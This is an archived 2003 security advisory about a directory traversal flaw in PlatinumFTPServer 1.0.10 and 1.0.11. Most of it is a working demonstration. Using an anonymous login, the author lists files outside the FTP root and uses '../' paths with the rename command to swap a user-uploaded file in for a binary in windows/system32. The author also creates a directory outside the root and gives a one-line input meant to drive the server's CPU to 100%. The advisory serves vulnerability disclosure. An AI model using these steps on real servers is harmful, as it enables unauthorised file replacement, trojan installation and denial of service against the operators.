Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: win6019.htm

Platinum FTP directory traversal



24th Feb 2003 [SBWID-6019]
COMMAND

	Platinum FTP directory traversal

SYSTEMS AFFECTED

	PlatinumFTPServer version 1.0.10, verion 1.0.11

PROBLEM

	SER Pui Kin [serpuikin@hotmail.com] found :
	
	A vulnerability in Platinum FTP server is that it cannot stop  users  to
	traverse the file system out of the FTP root directory  "/".  Meanwhile,
	anonymous user can retrieve or replace  any  file  in  the  FTP  server.
	Trojan house can be easily installed to the affected server.
	
	The DOS vulnerability reported by Dennis Rand for Plantinum  v1.0.7  has
	not been fixed yet in v1.0.11.
	
	
	 Demonstration
	 -------------------
	
	C:\testing>ftp localhost
	Connected to ibm-kin.
	220-PlatinumFTPserver V1.0.11
	220-PlatinumFTPserver (C)2002 BYTE/400 LTD
	220-
	220 Enter login details
	User (ibm-kin:(none)): anonymous
	331 Password required for anonymous.
	Password:
	230-Send comments to support@PlatinumFTP.com
	230-Date 2/24/2003, Time 9:56:07 AM.
	230 Storage available 8,671,645,696 Bytes.
	
	ftp> dir
	200 PORT command successful
	150 Opening ASCII mode data connection for /bin/ls.
	-rwxr-xr-x  1 User     Group             28 Feb 24 09:59 cmd3.exe
	226 Listing complete.
	ftp: 67 bytes received in 0.00Seconds 67000.00Kbytes/sec.
	
	ftp> pwd
	257 "/" is current directory.
	
	ftp> dir \..
	200 PORT command successful
	500 /. or \. reference not allowed for security reasons.
	
	########################################################
	## To retrieve file directory information out of the FTP root directory
	########################################################
	ftp> dir ..
	200 PORT command successful
	150 Opening ASCII mode data connection for /bin/ls.
	-rwxr-xr-x  1 User     Group           1406 Oct 10 23:38 3.ico
	drwxr-xr-x  1 User     Group              0 Feb 24 09:54 Backup
	-rwxr-xr-x  1 User     Group          90112 Aug 26 22:15 Clean.exe
	-rwxr-xr-x  1 User     Group         418816 Feb 22 06:19 Console.exe
	-rwxr-xr-x  1 User     Group         198315 Sep  3 03:47 FtpObjectHelp.chm
	-rwxr-xr-x  1 User     Group          46592 Dec 12 06:58 
	InstallService.exe
	-rwxr-xr-x  1 User     Group          15431 Jul  8 17:52 License.rtf
	drwxr-xr-x  1 User     Group              0 Feb 24 09:56 logs
	-rwxr-xr-x  1 User     Group        3224767 Jan  4 23:03 
	PlatinumFTPserver.chm
	-rwxr-xr-x  1 User     Group         141312 Feb 22 06:22 
	PlatinumFTPserverEngine.exe
	-rwxr-xr-x  1 User     Group           7406 Jul 19 23:51 Readme.ico
	-rwxr-xr-x  1 User     Group          27109 Feb 22 20:12 Readme.rtf
	-rwxr-xr-x  1 User     Group             69 Feb 22 11:54 reg.bat
	-rwxr-xr-x  1 User     Group          69904 Jun 24 18:02 RegPatch.exe
	-rwxr-xr-x  1 User     Group          43581 Feb 22 07:37 Releasenotes.rtf
	drwxr-xr-x  1 User     Group              0 Feb 24 10:04 root
	-rwxr-xr-x  1 User     Group         201728 Dec 11 07:09 ScriptEditor.exe
	drwxr-xr-x  1 User     Group              0 Feb 24 09:54 Scripts
	-rwxr-xr-x  1 User     Group           3036 Sep  1 15:37 TIPOFDAY.TXT
	-rwxr-xr-x  1 User     Group         468490 Jul  8 17:53 vbscript.chm
	-rwxr-xr-x  1 User     Group          61952 Aug 29 13:16 ViewLog.exe
	-rwxr-xr-x  1 User     Group          89600 Nov 23 04:00 ZipManager.exe
	-rwxr-xr-x  1 User     Group          92595 Sep  3 03:02 ZipObjectHelp.chm
	226 Listing complete.
	ftp: 1634 bytes received in 0.00Seconds 1634000.00Kbytes/sec.
	
	ftp> dir ../../../../windows/system32/cmd*
	200 PORT command successful
	150 Opening ASCII mode data connection for /bin/ls.
	-rwxr-xr-x  1 User     Group         375808 Aug 18 20:00 cmd.exe
	-rwxr-xr-x  1 User     Group         375808 Aug 18 20:00 cmd2.exe
	-rwxr-xr-x  1 User     Group         324608 Aug 29 18:40 cmdial32.dll
	-rwxr-xr-x  1 User     Group          41472 Aug 29 18:41 cmdl32.exe
	-rwxr-xr-x  1 User     Group          40505 Aug 18 20:00 cmdlib.wsc
	226 Listing complete.
	ftp: 342 bytes received in 0.00Seconds 342000.00Kbytes/sec.
	
	########################################################
	## To get the file cmd2.exe out of the FTP root
	########################################################
	
	ftp> get ../../../../windows/system32/cmd2.exe
	200 PORT command successful
	550 ../../../../windows/system32/cmd2.exe: No such file or directory.
	
	ftp> dir
	200 PORT command successful
	150 Opening ASCII mode data connection for /bin/ls.
	-rwxr-xr-x  1 User     Group             28 Feb 24 09:59 cmd3.exe
	226 Listing complete.
	ftp: 67 bytes received in 0.00Seconds 67000.00Kbytes/sec.
	
	ftp> rename ../../../../windows/system32/cmd2.exe
	To name cmd2.exe
	350 Command OK - waiting for name
	250 File/dir renamed to \cmd2.exe
	ftp> dir
	200 PORT command successful
	150 Opening ASCII mode data connection for /bin/ls.
	-rwxr-xr-x  1 User     Group         375808 Aug 18 20:00 cmd2.exe
	-rwxr-xr-x  1 User     Group             28 Feb 24 09:59 cmd3.exe
	226 Listing complete.
	ftp: 134 bytes received in 0.00Seconds 134000.00Kbytes/sec.
	
	########################################################
	## To replace the cmd2.exe with the anonymous's program cmd3.exe
	########################################################
	
	ftp> rename cmd3.exe
	To name ../../../../windows/system32/cmd2.exe
	350 Command OK - waiting for name
	250 File/dir renamed to \..\..\..\..\windows\system32\cmd2.exe
	
	ftp> dir ../../../../windows/system32/cmd*
	200 PORT command successful
	150 Opening ASCII mode data connection for /bin/ls.
	-rwxr-xr-x  1 User     Group         375808 Aug 18 20:00 cmd.exe
	-rwxr-xr-x  1 User     Group             28 Feb 24 09:59 cmd2.exe
	-rwxr-xr-x  1 User     Group         324608 Aug 29 18:40 cmdial32.dll
	-rwxr-xr-x  1 User     Group          41472 Aug 29 18:41 cmdl32.exe
	-rwxr-xr-x  1 User     Group          40505 Aug 18 20:00 cmdlib.wsc
	226 Listing complete.
	ftp: 342 bytes received in 0.00Seconds 342000.00Kbytes/sec.
	ftp>
	
	########################################################
	## To create directory out of the FTP root
	########################################################
	ftp> pwd
	257 "/" is current directory.
	ftp> mkdir ../testing1
	257 ../testing1 directory created
	
	########################################################
	## To DOS the FTP server. CPU will be 100% utilized
	########################################################
	ftp> cd @/..@/..
	

SOLUTION

	?


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH